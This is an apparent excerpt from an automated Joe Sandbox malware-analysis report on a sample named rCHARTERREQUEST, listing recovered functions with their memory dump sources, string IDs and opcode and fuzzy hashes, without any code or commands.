                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: ee7fd79def9f05a91ede16e3ebeb5c5fc31f7f1cb2cf6d6bcfb4471d66be06cf
                                                                                                          • Instruction ID: 5bd5e38ebc8cea2a758113e85d13866bb60d120f4d2440841ce83077ec5513e0
                                                                                                          • Opcode Fuzzy Hash: ee7fd79def9f05a91ede16e3ebeb5c5fc31f7f1cb2cf6d6bcfb4471d66be06cf
                                                                                                          • Instruction Fuzzy Hash: 1EB11574E00228CFEB94DF6AD884B9DBBF2FB89304F1480A9D489AB245D7359D85CF40
                                                                                                          Function 06D3A9A0 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 6d2c91c2a284232f61447b41cab61c62be552802a17ebf08be0621658e834d61
                                                                                                          • Instruction ID: d96dce257d620b1da587c9dceb43e96366cbb228d3aabc6c03198d485ddfd95b
                                                                                                          • Opcode Fuzzy Hash: 6d2c91c2a284232f61447b41cab61c62be552802a17ebf08be0621658e834d61
                                                                                                          • Instruction Fuzzy Hash: F9B11574E04228CFEB94CFAAD944B9DB7F2FB89304F1490A9D489AB255D7749D81CF40
                                                                                                          Function 06D4DF37 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: dbq
                                                                                                          • API String ID: 0-1887291361
                                                                                                          • Opcode ID: a5a8b47a3e424876cdd75a7963942d2981ba82cb73173e863c764b8bdd87f6c3
                                                                                                          • Instruction ID: f26e5e5928dc5698d9324ec9845a4a7bf1a2537fa7cc350b0e38c8ea899e2e6e
                                                                                                          • Opcode Fuzzy Hash: a5a8b47a3e424876cdd75a7963942d2981ba82cb73173e863c764b8bdd87f6c3
                                                                                                          • Instruction Fuzzy Hash: 08917574E05208CFDB60EFA9D8447ADBBF2FB8A304F1081A9D459A7295DB385D89CF41
                                                                                                          Function 06D4DF68 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: dbq
                                                                                                          • API String ID: 0-1887291361
                                                                                                          • Opcode ID: f656e301b2beda28479120c5a8a7b09be151864cca0a27403b225e17286b05d9
                                                                                                          • Instruction ID: 7d80f8725b0f7f8ba9515e498d433b4bd06d1e45cc35f4b398e33b6fb2ed6d09
                                                                                                          • Opcode Fuzzy Hash: f656e301b2beda28479120c5a8a7b09be151864cca0a27403b225e17286b05d9
                                                                                                          • Instruction Fuzzy Hash: 05810274A05208CFDB64EFAAD5447ADBBF2FB89304F108069D519A7395DB389D89CF40
                                                                                                          Function 064313C8 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          • Opcode ID: d7e33fe6e52170029edf45230808e7fc9ab60a64e4746d09036169c282178b06
                                                                                                          • Instruction ID: 1935da07de5f3fd749322cf6ded4ed33b42354a87b46f00b20151a2de5fd1229
                                                                                                          • Opcode Fuzzy Hash: d7e33fe6e52170029edf45230808e7fc9ab60a64e4746d09036169c282178b06
                                                                                                          • Instruction Fuzzy Hash: 72512870D05268CFEBA4CF59D84479ABBB2BBA9308F1480E6D40DB7241CB751AC9CF55
                                                                                                          Function 064313D8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (
                                                                                                          • API String ID: 0-3887548279
                                                                                                          • Opcode ID: e12f6b9971faee3d7d4df38412d27caefcc482e9cefdb32bab3005a99a54ceb9
                                                                                                          • Instruction ID: 91b9a69532b35d7db69abf7425ec2b7abb0193574084c5386cc6c1726c3f65fd
                                                                                                          • Opcode Fuzzy Hash: e12f6b9971faee3d7d4df38412d27caefcc482e9cefdb32bab3005a99a54ceb9
                                                                                                          • Instruction Fuzzy Hash: 01512570D05228CFEBA4CF5AD84479AB7F2ABA9309F14D0A6D40DB7250CB741ACACF51
                                                                                                          Function 06B81928 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: pqI
                                                                                                          • API String ID: 0-1078129942
                                                                                                          • Opcode ID: 4845a1e7c86c369589756e1f6c41da5fc55e7cd251711de1bf6b0782bffab88b
                                                                                                          • Instruction ID: 305498bc00a765e7902e86593828d4b82bcdb28b6303fe6ae19e4cb93e346c7d
                                                                                                          • Opcode Fuzzy Hash: 4845a1e7c86c369589756e1f6c41da5fc55e7cd251711de1bf6b0782bffab88b
                                                                                                          • Instruction Fuzzy Hash: 77418FB0E0614BCFDB84DFADC4815AEBBF2AB89300F54C5A58416E7744E3748A46CBD0
                                                                                                          Function 06C62000 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: V
                                                                                                          • API String ID: 0-1342839628
                                                                                                          • Opcode ID: 4d1c6df937fa1ddd6a13b71cb4b3790694ca76af01b5b7172af68f7a387b17aa
                                                                                                          • Instruction ID: 6fe305bda55fc08891b87d948011c1d0bad7e68e8491e3b5f112a9405ec8bcfa
                                                                                                          • Opcode Fuzzy Hash: 4d1c6df937fa1ddd6a13b71cb4b3790694ca76af01b5b7172af68f7a387b17aa
                                                                                                          • Instruction Fuzzy Hash: F451AA71E152288FEB69CF6BC844799F6FAAF89304F04D0E9E94CA6254D7740B85CF05
                                                                                                          Function 06B81918 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: pqI
                                                                                                          • API String ID: 0-1078129942
                                                                                                          • Opcode ID: 18591ad1fe6fe061845294a874a6309ab86d2a9e27cda774a71c7b0135442c59
                                                                                                          • Instruction ID: a09f15ad3311353fac32df5c28ed1832b7e877517100a3d6245e14df105d196b
                                                                                                          • Opcode Fuzzy Hash: 18591ad1fe6fe061845294a874a6309ab86d2a9e27cda774a71c7b0135442c59
                                                                                                          • Instruction Fuzzy Hash: E641C3B0E0614B9FDB84DFACC4815AEBBF2AB49340F6489A5D516E7744E334CA46CBD0
                                                                                                          Function 06C6F670 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $
                                                                                                          • API String ID: 0-3993045852
                                                                                                          • Opcode ID: 1429893037a1a6afea51397d8e958b9fc11dad9bf53387950afac01f55865832
                                                                                                          • Instruction ID: ace29269aaf86e7f8fcbc6a9b6bf19e1f562852281c0c8aff5a9da4882734a3e
                                                                                                          • Opcode Fuzzy Hash: 1429893037a1a6afea51397d8e958b9fc11dad9bf53387950afac01f55865832
                                                                                                          • Instruction Fuzzy Hash: 4141D4B4E05219CFEB58CF6BD98479EBBF3BB89304F10C0A9D418A7254DB3459868F54
                                                                                                          Function 06D8CC12 Relevance: .3, Instructions: 261COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 645c1fe64f5b8c8b8152594902cb5ed5356dd3ee98e8598dc2cfba97e25d7fcf
                                                                                                          • Instruction ID: e5d33825169ee400cc6198fab3a823c8f6340ce25060208e3101bf781cadff39
                                                                                                          • Opcode Fuzzy Hash: 645c1fe64f5b8c8b8152594902cb5ed5356dd3ee98e8598dc2cfba97e25d7fcf
                                                                                                          • Instruction Fuzzy Hash: AFB1F674E11208CFEB54EFAAD488B9DBBF2FB89304F208069E419A7355DB349985CF51
                                                                                                          Function 06D8CC20 Relevance: .3, Instructions: 255COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c1ff836f941f1c966d6032443590ad62f2c5f1556f7f73631d1622a25391111
                                                                                                          • Instruction ID: e22a228c7bc2733636c4755c20041e42a82f9fba791627f2ea904e992db6c949
                                                                                                          • Opcode Fuzzy Hash: 0c1ff836f941f1c966d6032443590ad62f2c5f1556f7f73631d1622a25391111
                                                                                                          • Instruction Fuzzy Hash: 1FB11774E15208CFEB54EFAAD488B9DBBF2FB89304F208069E419A7355DB349985CF50
                                                                                                          Function 06D848B8 Relevance: .2, Instructions: 214COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 04c9bc5c3628c24225b42eede5d8be6159681657292cc0964338419a316ca8b8
                                                                                                          • Instruction ID: e66bf24a2a1a423d454adcd29431644829e2ec581b4d75ca29dd3c4a0cd7bf52
                                                                                                          • Opcode Fuzzy Hash: 04c9bc5c3628c24225b42eede5d8be6159681657292cc0964338419a316ca8b8
                                                                                                          • Instruction Fuzzy Hash: B3814674E05219CFDB94EFA9D588BADBBF6FB8A304F105069D049A7240DB389D85CF40
                                                                                                          Function 0705E498 Relevance: .2, Instructions: 212COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fed0e87715a244d531d703ea44fea734cb81219219d2da1ca365bec79e4d965a
                                                                                                          • Instruction ID: 9f84b6b04d7561113c40297c55328a7eeb6d93dd063a940e74bed4906e304c76
                                                                                                          • Opcode Fuzzy Hash: fed0e87715a244d531d703ea44fea734cb81219219d2da1ca365bec79e4d965a
                                                                                                          • Instruction Fuzzy Hash: 249119B0D15218CFDB64DFA9C844B9EBBF5FF4A304F1082A9D859AB250DB745A85CF02
                                                                                                          Function 06D848C8 Relevance: .2, Instructions: 207COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7685e2408a2ffcecdb755d7d37eb8c890851a1fee504c24f172e0552986a06d9
                                                                                                          • Instruction ID: 9dac5bcd5be692a3ec5b4a16e3a0f7ac3bde248efe6ac3e283bc0d13c16102b2
                                                                                                          • Opcode Fuzzy Hash: 7685e2408a2ffcecdb755d7d37eb8c890851a1fee504c24f172e0552986a06d9
                                                                                                          • Instruction Fuzzy Hash: 7D814674E05219CFDB94EFA9D588BADBBF6FB8A308F105069D549A7340CB389985CF40
                                                                                                          Function 06D84C79 Relevance: .2, Instructions: 204COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c89092eba9366172da1002e4e3353f3e82e7e3e23b37c8fd3bac5f1afc7f116c
                                                                                                          • Instruction ID: e396f421af53df39a60eb49d5e505e5f92d38ea8afbf02b80393ce7fd9b0e803
                                                                                                          • Opcode Fuzzy Hash: c89092eba9366172da1002e4e3353f3e82e7e3e23b37c8fd3bac5f1afc7f116c
                                                                                                          • Instruction Fuzzy Hash: F5818874E05209CFDB94EFA9D488BADBBF6FB8A308F105169D019A7240CB389D85CF40
                                                                                                          Function 06B84BF0 Relevance: .2, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 78e7c24ec2955d9b732dce8fe1dac19444a2d7ec4b14bd705c91388a61172080
                                                                                                          • Instruction ID: b194869a200b229379ed8515058696cd79d9da7ea992667da059c6c4a056051a
                                                                                                          • Opcode Fuzzy Hash: 78e7c24ec2955d9b732dce8fe1dac19444a2d7ec4b14bd705c91388a61172080
                                                                                                          • Instruction Fuzzy Hash: D391DFB4E00209CFDB48DF99D580AAEBBF6FF88314F208169E815A7355D734A946CF90
                                                                                                          Function 06D84B45 Relevance: .2, Instructions: 196COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b6517fe07aac6d15cb36e71daeb2d14c261eed09d667d5ed27b4da1d09a89c2b
                                                                                                          • Instruction ID: 287aa6333eb5fcefce733eb98c3bb46015d0c68a029347c9ba6fb62b5541f180
                                                                                                          • Opcode Fuzzy Hash: b6517fe07aac6d15cb36e71daeb2d14c261eed09d667d5ed27b4da1d09a89c2b
                                                                                                          • Instruction Fuzzy Hash: D7812B74E45209CFDB54EFA9D448BADB7F5FB8A304F109069D459A7344D7389885CF40
                                                                                                          Function 0705E9A8 Relevance: .2, Instructions: 182COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f4ccf9d3975ae14e433df5475484a39220ce6e367030b7a132c410f9ddd2016
                                                                                                          • Instruction ID: 2061aff0d27894576029cbc38505c445006ee84ae7a3dc2d64a1076c58577476
                                                                                                          • Opcode Fuzzy Hash: 2f4ccf9d3975ae14e433df5475484a39220ce6e367030b7a132c410f9ddd2016
                                                                                                          • Instruction Fuzzy Hash: A0715AB4D05208CFEB54CF99D4847EEBBF2FB8A305F109225E859BB284D7785A85CB04
                                                                                                          Function 06D4E671 Relevance: .2, Instructions: 167COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9f3cd56ed09066944556a5c112bda53ac119ea35e3ad018effd88536fe9203c0
                                                                                                          • Instruction ID: 5e74f9f1648de32e8179c89ee910735a979b361feea942a97049435b439e98a9
                                                                                                          • Opcode Fuzzy Hash: 9f3cd56ed09066944556a5c112bda53ac119ea35e3ad018effd88536fe9203c0
                                                                                                          • Instruction Fuzzy Hash: 5A511474D09218EFDB50EFA9E4487EDBBF2FB8A314F10516AE405A7282C7789D46CB40
                                                                                                          Function 06D4E6B0 Relevance: .1, Instructions: 149COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9ecd337f9091c9ad6b5b73de51ebd0e84a455a4de97b2f2c2248f66a6d26fbb8
                                                                                                          • Instruction ID: 625c3e0dae952dd40d33486b21f2fde5c65542dafb214592de7cab8acf4c677e
                                                                                                          • Opcode Fuzzy Hash: 9ecd337f9091c9ad6b5b73de51ebd0e84a455a4de97b2f2c2248f66a6d26fbb8
                                                                                                          • Instruction Fuzzy Hash: 44510374D05218DFDB50EFAAE4487EDBBF2FB89314F105129E415A7282C7789D46CB44
                                                                                                          Function 06D4E6C0 Relevance: .1, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f4c7cafc425640581443b38828180e5d50b5ab6b1b1444b6f400e30b73b405a4
                                                                                                          • Instruction ID: de33ea1f35f6c3f49c83d1f574461a6548aa81281bb235dc1dcea2a08f35d2e5
                                                                                                          • Opcode Fuzzy Hash: f4c7cafc425640581443b38828180e5d50b5ab6b1b1444b6f400e30b73b405a4
                                                                                                          • Instruction Fuzzy Hash: A451F274D09218DFEB50EFAAE4487EDBBF2FB8A314F105129D405A7282C7789D86CB40
                                                                                                          Function 06DA0007 Relevance: .1, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934843193.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6da0000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2bfe452eae4ac3e0fa2cd311f127012d3167758c83a58ada5688dd80da8d85cf
                                                                                                          • Instruction ID: fe8730f2ccb22c50f9ad4510ac6334acbdffa330a0d9ca71f02751cb26cde996
                                                                                                          • Opcode Fuzzy Hash: 2bfe452eae4ac3e0fa2cd311f127012d3167758c83a58ada5688dd80da8d85cf
                                                                                                          • Instruction Fuzzy Hash: 52516A71D056588FE76DCF6B8C442CABAF3AFC9304F14C1FA854CAA265DB3409828E51
                                                                                                          Function 06DA0AA7 Relevance: .1, Instructions: 127COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934843193.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6da0000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1ebf9b41c295fbeb75e167d34d84896a4af2ab9002c16d034e4b8ada140258d
                                                                                                          • Instruction ID: 96c007ebcc29d3c02e02aca03fa54718064f01d785aafe0182388bead2e214ba
                                                                                                          • Opcode Fuzzy Hash: a1ebf9b41c295fbeb75e167d34d84896a4af2ab9002c16d034e4b8ada140258d
                                                                                                          • Instruction Fuzzy Hash: B5518074D497288FEB66CF25C944BA9B7BABB48309F04D0EA9419A3250DB745BC5CF40
                                                                                                          Function 06C683AA Relevance: .1, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9a4f58cb0fc1e9bae0fdf2f1dd614fad3df65de1b2c0f320899a03e547980b6e
                                                                                                          • Instruction ID: 4052acee67d951a8f1e348a60b07316a2f30f3ef48bf909423dc2cdfae0a4a90
                                                                                                          • Opcode Fuzzy Hash: 9a4f58cb0fc1e9bae0fdf2f1dd614fad3df65de1b2c0f320899a03e547980b6e
                                                                                                          • Instruction Fuzzy Hash: 904156B1E016198BDB18CFABC94069EFBF3BFC8300F14C07AD958AB264DB3459468B54
                                                                                                          Function 07040040 Relevance: .1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4da5972a35772d3a41e4742b9d6e5c80c9814277fffa75d53d3e4e6873001cab
                                                                                                          • Instruction ID: 7b0920b8a953ac8915387055880c7e517b1f811bf67a5297047bce444085e34f
                                                                                                          • Opcode Fuzzy Hash: 4da5972a35772d3a41e4742b9d6e5c80c9814277fffa75d53d3e4e6873001cab
                                                                                                          • Instruction Fuzzy Hash: BB51D8B0D046298FDB68DF5AC8487DABBF6BB88305F00C1EAD519A7354EB744A858F11
                                                                                                          Function 07040006 Relevance: .1, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0f14456f869332d4ed7c1f3aef0074333afa61b0f756ef6b8e3f1d977da306bc
                                                                                                          • Instruction ID: ff6cb5eb399b0d27a3a76d967471e23721fa254266ae73c660d8975df48b5998
                                                                                                          • Opcode Fuzzy Hash: 0f14456f869332d4ed7c1f3aef0074333afa61b0f756ef6b8e3f1d977da306bc
                                                                                                          • Instruction Fuzzy Hash: 9C315AB1D087958FE72ACF6BCC0428ABBF6AF85210F05C1FAD448AB266D7740985CF11
                                                                                                          Function 06D30007 Relevance: .1, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d67a58a73d2cc794f7d4cb2a3441fa6ac22e98937eac3b132128ecd6b98b9a6c
                                                                                                          • Instruction ID: fa1bc7f1ccf24c6d2ada26a278c4cb66bdb4befed34b2a309c4df9f2f04b9594
                                                                                                          • Opcode Fuzzy Hash: d67a58a73d2cc794f7d4cb2a3441fa6ac22e98937eac3b132128ecd6b98b9a6c
                                                                                                          • Instruction Fuzzy Hash: 90312FB1D097949FD759CF678C0019ABFF7AFC6210F09C0AAD558AB266D6340949CF50
                                                                                                          Function 06C61FF0 Relevance: .1, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b4c2a6411fa454deaeeb77b10691ae4f6ba612300ddebb57de7333f973ff91b
                                                                                                          • Instruction ID: b0622ffbc302abdbae328aa259087d8ddba0ead023a19803a30439733ea4d44d
                                                                                                          • Opcode Fuzzy Hash: 0b4c2a6411fa454deaeeb77b10691ae4f6ba612300ddebb57de7333f973ff91b
